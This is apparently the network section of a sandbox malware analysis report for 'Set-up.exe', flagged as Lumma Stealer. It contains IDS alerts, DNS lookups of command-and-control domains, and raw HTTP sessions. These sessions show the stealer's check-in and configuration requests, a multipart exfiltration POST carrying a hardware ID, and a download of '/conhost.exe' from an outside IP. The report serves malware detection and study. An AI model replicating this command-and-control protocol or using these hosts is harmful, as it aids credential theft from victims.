2024-11-07T17:39:21.047264+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49733 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:21.047264+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49733 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:22.136265+0100 | 2057270 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) | 1 | 192.168.2.4 | 49734 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:22.136265+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:22.807473+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49734 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:22.807473+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49734 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:23.780419+0100 | 2057270 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) | 1 | 192.168.2.4 | 49736 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:23.780419+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49736 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:24.473718+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.4 | 49735 | TCP
2024-11-07T17:39:25.179012+0100 | 2057270 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) | 1 | 192.168.2.4 | 49740 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:25.179012+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:26.832488+0100 | 2057270 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) | 1 | 192.168.2.4 | 49742 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:26.832488+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49742 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:28.750013+0100 | 2057270 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) | 1 | 192.168.2.4 | 49744 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:28.750013+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49744 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:30.232631+0100 | 2057270 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) | 1 | 192.168.2.4 | 49745 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:30.232631+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49745 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:30.721297+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49745 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:31.980700+0100 | 2057270 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) | 1 | 192.168.2.4 | 49746 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:31.980700+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49746 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:33.402164+0100 | 2057270 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) | 1 | 192.168.2.4 | 49747 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:33.402164+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49747 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:35.031255+0100 | 2057270 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) | 1 | 192.168.2.4 | 49748 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:35.031255+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49748 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:35.377073+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49748 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:45.689040+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.4 | 56314 | TCP
2024-11-07T17:39:47.147971+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.4 | 56315 | TCP
                                                                                                                                Nov 7, 2024 17:39:32.725173950 CET44349746104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:32.725271940 CET49746443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:32.725466013 CET49746443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:32.725481987 CET44349746104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:32.793461084 CET49747443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:32.793500900 CET44349747104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:32.793586969 CET49747443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:32.793910027 CET49747443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:32.793921947 CET44349747104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:33.401932955 CET44349747104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:33.402163982 CET49747443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:33.403409004 CET49747443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:33.403417110 CET44349747104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:33.403704882 CET44349747104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:33.404864073 CET49747443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:33.404939890 CET49747443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:33.404944897 CET44349747104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:34.392986059 CET44349747104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:34.393088102 CET44349747104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:34.393147945 CET49747443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:34.393305063 CET49747443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:34.393320084 CET44349747104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:34.421556950 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:34.421585083 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:34.421684027 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:34.422008038 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:34.422019005 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.031039953 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.031255007 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:35.033224106 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:35.033240080 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.033525944 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.034718990 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:35.034750938 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:35.034790993 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.377079964 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.377171040 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.377229929 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:35.377371073 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:35.377393961 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.377405882 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:35.377412081 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.378597975 CET4974980192.168.2.4147.45.47.81
                                                                                                                                Nov 7, 2024 17:39:35.383404970 CET8049749147.45.47.81192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.383521080 CET4974980192.168.2.4147.45.47.81
                                                                                                                                Nov 7, 2024 17:39:35.388577938 CET4974980192.168.2.4147.45.47.81
                                                                                                                                Nov 7, 2024 17:39:35.393444061 CET8049749147.45.47.81192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:43.885170937 CET8049749147.45.47.81192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:43.885242939 CET4974980192.168.2.4147.45.47.81
                                                                                                                                Nov 7, 2024 17:39:43.885374069 CET4974980192.168.2.4147.45.47.81
                                                                                                                                Nov 7, 2024 17:39:43.890207052 CET8049749147.45.47.81192.168.2.4
                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Nov 7, 2024 17:39:19.841911077 CET5476053192.168.2.41.1.1.1
                                                                                                                                Nov 7, 2024 17:39:19.865122080 CET53547601.1.1.1192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:19.871747971 CET5710853192.168.2.41.1.1.1
                                                                                                                                Nov 7, 2024 17:39:19.882040024 CET53571081.1.1.1192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:39.962527990 CET5363789162.159.36.2192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:40.602502108 CET6360553192.168.2.41.1.1.1
                                                                                                                                Nov 7, 2024 17:39:40.648552895 CET53636051.1.1.1192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:42.382181883 CET5341653192.168.2.41.1.1.1
                                                                                                                                Nov 7, 2024 17:39:42.392796040 CET53534161.1.1.1192.168.2.4
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Nov 7, 2024 17:39:19.841911077 CET | 192.168.2.4 | 1.1.1.1 | 0x1694 | Standard query (0) | corehairydu.icu | A (IP address) | IN (0x0001) | false |
| Nov 7, 2024 17:39:19.871747971 CET | 192.168.2.4 | 1.1.1.1 | 0xbea | Standard query (0) | worddosofrm.shop | A (IP address) | IN (0x0001) | false |
| Nov 7, 2024 17:39:40.602502108 CET | 192.168.2.4 | 1.1.1.1 | 0xecf5 | Standard query (0) | 18.31.95.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false |
| Nov 7, 2024 17:39:42.382181883 CET | 192.168.2.4 | 1.1.1.1 | 0xaf8b | Standard query (0) | 50.23.12.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Nov 7, 2024 17:39:19.865122080 CET | 1.1.1.1 | 192.168.2.4 | 0x1694 | Name error (3) | corehairydu.icu | none | none | A (IP address) | IN (0x0001) | false |
| Nov 7, 2024 17:39:19.882040024 CET | 1.1.1.1 | 192.168.2.4 | 0xbea | No error (0) | worddosofrm.shop | | 104.21.16.142 | A (IP address) | IN (0x0001) | false |
| Nov 7, 2024 17:39:19.882040024 CET | 1.1.1.1 | 192.168.2.4 | 0xbea | No error (0) | worddosofrm.shop | | 172.67.212.246 | A (IP address) | IN (0x0001) | false |
| Nov 7, 2024 17:39:40.648552895 CET | 1.1.1.1 | 192.168.2.4 | 0xecf5 | Name error (3) | 18.31.95.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false |
| Nov 7, 2024 17:39:42.392796040 CET | 1.1.1.1 | 192.168.2.4 | 0xaf8b | Name error (3) | 50.23.12.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false |

                                                                                                                                • worddosofrm.shop
                                                                                                                                • 147.45.47.81
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 0 | 192.168.2.4 | 49749 | 147.45.47.81 | 80 | 6544 | C:\Users\user\Desktop\Set-up.exe |

Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 17:39:35.388577938 CET | 198 | OUT | GET /conhost.exe HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Host: 147.45.47.81


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 0 | 192.168.2.4 | 49733 | 104.21.16.142 | 443 | 6544 | C:\Users\user\Desktop\Set-up.exe |

Timestamp | Bytes transferred | Direction | Data
2024-11-07 16:39:20 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 8
                                                                                                                                Host: worddosofrm.shop
2024-11-07 16:39:20 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                Data Ascii: act=life
2024-11-07 16:39:21 UTC | 1013 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:20 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=uhb52sa7ena69ggj8o0ngb8sg1; expires=Mon, 03-Mar-2025 10:25:59 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n%2B3Pl2X1CmqhnlELnnpgl8HqGJ8SMD13Qhsr1%2FOtx1rT5D9wJmL3OArs0XtL6ubvt5U%2FOBTeJwHw%2FnVvvqv%2BiaoA%2FLdSs08oAqr8BS5yd8ErH5X5ybKmB8CjbJ9j0E6zF2EN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec241fd752c8f-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1481&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1901510&cwnd=251&unsent_bytes=0&cid=4e3e7637e99a2a18&ts=549&x=0"
2024-11-07 16:39:21 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-11-07 16:39:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 1 | 192.168.2.4 | 49734 | 104.21.16.142 | 443 | 6544 | C:\Users\user\Desktop\Set-up.exe |

Timestamp | Bytes transferred | Direction | Data
2024-11-07 16:39:22 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 82
                                                                                                                                Host: worddosofrm.shop
2024-11-07 16:39:22 UTC | 82 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 61 62 6f 62 61 34 35 26 6a 3d 37 63 32 36 33 33 35 37 64 30 34 61 66 66 34 37 33 63 62 32 65 64 61 38 61 34 32 66 66 30 33 33
                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@aboba45&j=7c263357d04aff473cb2eda8a42ff033
2024-11-07 16:39:22 UTC | 1006 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:22 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=v4a07rl1dhijgfq4faeh88jj67; expires=Mon, 03-Mar-2025 10:26:01 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0wVVgqhgclZa2O8hWlPPCClnH2i1LeAHI9706R6eYQYFBuJTYVlSVJ54TYs3xaNaL7qTm8ykAf5yoG9%2BLwFei4CYTU2oiaizRECDimwHVAg2AWlaSlSI%2Bc40%2FTPqLf7BTdQC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec24bdfcae755-DEN
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=18819&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=982&delivery_rate=153503&cwnd=32&unsent_bytes=0&cid=5a6037d570dfce51&ts=677&x=0"
                                                                                                                                Data Ascii: GWCtEpAha+psvyOtnGrYZqoN5hzOEU4YpLT6kWWj+rBTJ+YZg2U/o0aeF+q4UZx17hKlGM1eGVDo+baecuWr/Hw55huOISzkWtgR4/0I2HXtEqAezlAQUK2/8phso/CzXSvsGoxtPaBCmRrksludOapUoQOCCVZpq6HhiWbl7PJAbuoZyDlzq1GSHOG4X5166
                                                                                                                                2024-11-07 16:39:22 UTC1369INData Raw: 33 35 38 66 0d 0a 78 4f 72 48 63 35 62 48 31 43 75 75 50 2b 4c 61 61 6e 39 75 31 63 69 34 78 69 43 59 6a 37 71 44 64 67 52 39 2f 30 49 32 46 58 6a 47 59 67 51 7a 6c 5a 57 52 2b 61 75 74 70 35 6d 35 61 76 38 56 53 54 68 48 49 68 6f 4e 71 4a 49 6b 52 50 75 74 6c 57 62 66 2b 6b 62 72 77 6e 49 55 68 68 62 70 4c 76 77 6d 47 6d 33 2b 37 55 5a 59 4b 30 53 6b 43 46 72 36 6d 4b 57 47 2f 75 36 51 4e 68 6d 71 67 33 6d 48 4d 34 52 54 68 69 72 74 76 6d 61 61 36 6a 31 74 56 45 75 36 78 43 48 62 44 32 74 52 4a 67 62 34 62 4a 57 6b 48 54 6f 48 36 67 53 78 46 45 58 55 75 6a 35 74 70 35 79 35 61 76 38 61 53 33 74 46 5a 4d 68 4c 4f 52 61 32 42 48 6a 2f 51 6a 59 61 2b 34 64 70 68 6a 4e 56 68 4a 54 70 4c 4c 7a 6c 6d 6d 73 39 72 56 58 50 4f 51 62 67 47 6b 38 72 30 69 59 47 2b
                                                                                                                                Data Ascii: 358fxOrHc5bH1CuuP+Laan9u1ci4xiCYj7qDdgR9/0I2FXjGYgQzlZWR+autp5m5av8VSThHIhoNqJIkRPutlWbf+kbrwnIUhhbpLvwmGm3+7UZYK0SkCFr6mKWG/u6QNhmqg3mHM4RThirtvmaa6j1tVEu6xCHbD2tRJgb4bJWkHToH6gSxFEXUuj5tp5y5av8aS3tFZMhLORa2BHj/QjYa+4dphjNVhJTpLLzlmms9rVXPOQbgGk8r0iYG+
                                                                                                                                2024-11-07 16:39:22 UTC1369INData Raw: 65 4f 34 47 74 42 66 4c 57 52 4e 55 6f 37 6e 77 69 32 79 71 2b 72 39 61 4a 2b 6f 64 68 47 73 77 72 51 50 57 56 75 69 6c 45 4d 41 35 78 77 4f 32 46 6f 4a 4f 57 45 48 6f 73 50 72 5a 4d 75 58 37 73 56 45 6b 36 52 4b 46 5a 6a 57 6a 55 5a 45 54 34 62 31 55 6b 33 62 69 45 4b 55 62 30 46 63 53 55 4b 75 36 2b 35 64 70 6f 62 50 79 47 53 6e 31 56 64 41 68 41 61 64 4e 67 78 6e 6f 72 46 72 59 5a 71 6f 4e 35 68 7a 4f 45 55 34 59 72 4c 6e 6b 6b 6d 75 75 2b 4c 4a 65 49 65 67 66 69 47 34 33 71 55 32 54 46 2b 79 31 58 5a 56 33 37 68 32 76 48 4d 35 56 45 52 6a 6d 39 2f 47 42 4b 76 32 7a 6c 33 67 44 77 52 4b 53 49 53 7a 6b 57 74 67 52 34 2f 30 49 32 48 58 74 47 4b 77 51 78 56 73 59 55 61 61 38 35 49 74 70 6f 66 43 31 57 69 6e 6b 47 34 68 6d 4e 71 52 45 6d 52 33 72 74 31 4f
                                                                                                                                Data Ascii: eO4GtBfLWRNUo7nwi2yq+r9aJ+odhGswrQPWVuilEMA5xwO2FoJOWEHosPrZMuX7sVEk6RKFZjWjUZET4b1Uk3biEKUb0FcSUKu6+5dpobPyGSn1VdAhAadNgxnorFrYZqoN5hzOEU4YrLnkkmuu+LJeIegfiG43qU2TF+y1XZV37h2vHM5VERjm9/GBKv2zl3gDwRKSISzkWtgR4/0I2HXtGKwQxVsYUaa85ItpofC1WinkG4hmNqREmR3rt1O
                                                                                                                                2024-11-07 16:39:22 UTC1369INData Raw: 50 35 62 77 31 6f 63 56 36 57 30 38 4a 70 68 6f 50 6d 39 58 69 62 67 42 34 74 75 50 4b 35 44 6c 78 44 70 76 46 2b 65 66 75 30 56 72 68 79 43 48 31 5a 66 73 50 65 75 32 55 53 69 38 4c 67 5a 4d 61 4d 4d 79 47 59 2f 36 68 76 59 46 75 57 33 57 70 5a 35 34 77 61 67 45 73 4a 53 42 46 75 75 76 2f 43 56 5a 71 6a 37 74 56 6b 72 35 68 69 44 62 44 57 71 53 4a 6c 57 6f 66 31 58 67 44 6d 38 56 4a 63 57 7a 46 55 59 57 37 69 77 74 6f 59 6b 76 4c 4f 37 56 57 36 31 56 59 64 6f 49 61 31 47 6b 42 2f 76 73 31 6d 52 66 75 41 58 70 78 2f 4f 58 68 39 62 6f 4c 62 2b 6c 6d 6d 6c 2b 4c 52 54 4c 2b 4d 51 79 43 39 7a 72 56 76 59 54 71 2b 53 55 35 31 79 35 56 61 42 48 63 56 64 56 6b 66 6d 72 72 61 65 5a 75 57 72 2f 46 6f 71 34 78 79 48 5a 54 6d 74 51 35 38 51 37 37 56 62 6c 58 4c 32
                                                                                                                                Data Ascii: P5bw1ocV6W08JphoPm9XibgB4tuPK5DlxDpvF+efu0VrhyCH1ZfsPeu2USi8LgZMaMMyGY/6hvYFuW3WpZ54wagEsJSBFuuv/CVZqj7tVkr5hiDbDWqSJlWof1XgDm8VJcWzFUYW7iwtoYkvLO7VW61VYdoIa1GkB/vs1mRfuAXpx/OXh9boLb+lmml+LRTL+MQyC9zrVvYTq+SU51y5VaBHcVdVkfmrraeZuWr/Foq4xyHZTmtQ58Q77VblXL2
                                                                                                                                2024-11-07 16:39:22 UTC1369INData Raw: 42 58 46 55 36 72 38 4d 69 6e 61 62 50 2b 73 31 49 76 30 79 75 6d 62 44 4b 70 54 64 6f 6e 2b 62 42 41 6d 33 7a 6a 4b 70 67 56 78 55 55 52 56 71 36 33 74 74 63 71 71 72 50 6b 59 47 36 6c 56 62 63 76 63 37 49 44 77 46 62 61 76 6c 36 57 66 76 49 46 36 7a 6a 55 58 42 6c 54 71 66 65 34 32 57 7a 6c 71 2b 77 58 62 75 6b 45 79 44 6c 6a 2b 42 6a 4e 52 62 6a 74 41 6f 63 33 2f 56 53 77 57 35 6f 44 57 42 69 36 39 36 37 5a 4c 61 76 2b 76 56 6f 67 37 67 65 61 5a 7a 43 38 51 4e 38 6f 30 5a 78 64 6b 33 58 70 47 36 30 6c 2f 48 41 62 55 36 53 36 2b 5a 4a 55 6d 2b 61 2f 56 79 44 71 41 35 6b 68 66 65 70 4d 32 45 37 57 2f 52 6a 59 52 71 70 55 76 6c 75 61 45 53 4e 62 70 72 6e 78 6a 33 76 6f 30 72 46 53 49 75 41 61 67 79 46 39 36 6b 58 59 54 72 2f 7a 45 4a 78 6f 70 45 7a 32 53
                                                                                                                                Data Ascii: BXFU6r8MinabP+s1Iv0yumbDKpTdon+bBAm3zjKpgVxUURVq63ttcqqrPkYG6lVbcvc7IDwFbavl6WfvIF6zjUXBlTqfe42Wzlq+wXbukEyDlj+BjNRbjtAoc3/VSwW5oDWBi6967ZLav+vVog7geaZzC8QN8o0Zxdk3XpG60l/HAbU6S6+ZJUm+a/VyDqA5khfepM2E7W/RjYRqpUvluaESNbprnxj3vo0rFSIuAagyF96kXYTr/zEJxopEz2S
                                                                                                                                2024-11-07 16:39:22 UTC1369INData Raw: 6d 67 37 76 77 6e 6e 43 69 39 5a 70 35 62 71 4e 56 68 79 46 72 6b 77 50 51 56 74 44 7a 45 49 41 35 76 46 53 54 47 4d 78 66 45 55 36 35 2b 74 4f 4f 61 62 58 31 76 78 6c 67 72 52 50 49 4f 57 50 6b 41 35 77 48 72 2b 55 41 79 69 4b 78 52 2f 46 4c 6b 45 35 59 51 65 69 68 74 73 45 34 36 37 4f 75 47 58 61 74 55 6f 74 7a 49 61 78 41 6a 68 57 6f 67 32 36 2b 65 76 55 65 68 78 62 53 56 69 68 6d 76 62 54 34 6c 32 32 7a 34 76 77 58 62 75 4a 56 30 46 68 7a 34 67 2b 65 46 66 6e 39 62 39 59 35 2f 46 54 2b 57 2f 64 53 47 46 61 76 6f 65 66 55 54 4b 62 69 74 6e 67 6a 2f 52 4c 49 4c 33 4f 73 41 38 42 46 6f 66 31 55 69 54 6d 38 52 50 52 41 6c 77 4a 42 43 50 71 6f 75 49 41 71 73 37 50 6b 43 32 43 74 42 38 67 35 63 2b 31 41 69 67 54 70 76 6b 61 62 50 74 6f 71 6b 78 6a 4d 58 78
                                                                                                                                Data Ascii: mg7vwnnCi9Zp5bqNVhyFrkwPQVtDzEIA5vFSTGMxfEU65+tOOabX1vxlgrRPIOWPkA5wHr+UAyiKxR/FLkE5YQeihtsE467OuGXatUotzIaxAjhWog26+evUehxbSVihmvbT4l22z4vwXbuJV0Fhz4g+eFfn9b9Y5/FT+W/dSGFavoefUTKbitngj/RLIL3OsA8BFof1UiTm8RPRAlwJBCPqouIAqs7PkC2CtB8g5c+1AigTpvkabPtoqkxjMXx


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49736 | 104.21.16.142 | 443 | 6544 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-07 16:39:23 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=J0PC41K8W4FXK9GUKSTP
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 18178
                                                                                                                                Host: worddosofrm.shop
2024-11-07 16:39:23 UTC | 15331 | OUT |
Data Ascii: --J0PC41K8W4FXK9GUKSTPContent-Disposition: form-data; name="hwid"6A5015BFFC3EE0A156626D7828374B6B--J0PC41K8W4FXK9GUKSTPContent-Disposition: form-data; name="pid"2--J0PC41K8W4FXK9GUKSTPContent-Disposition: form-data; name="lid"BVnUqo-
2024-11-07 16:39:24 UTC | 1013 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:24 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=7p026fbc5r7ps2it61vlfq13lf; expires=Mon, 03-Mar-2025 10:26:03 GMT; Max-Age=9999999; path=/
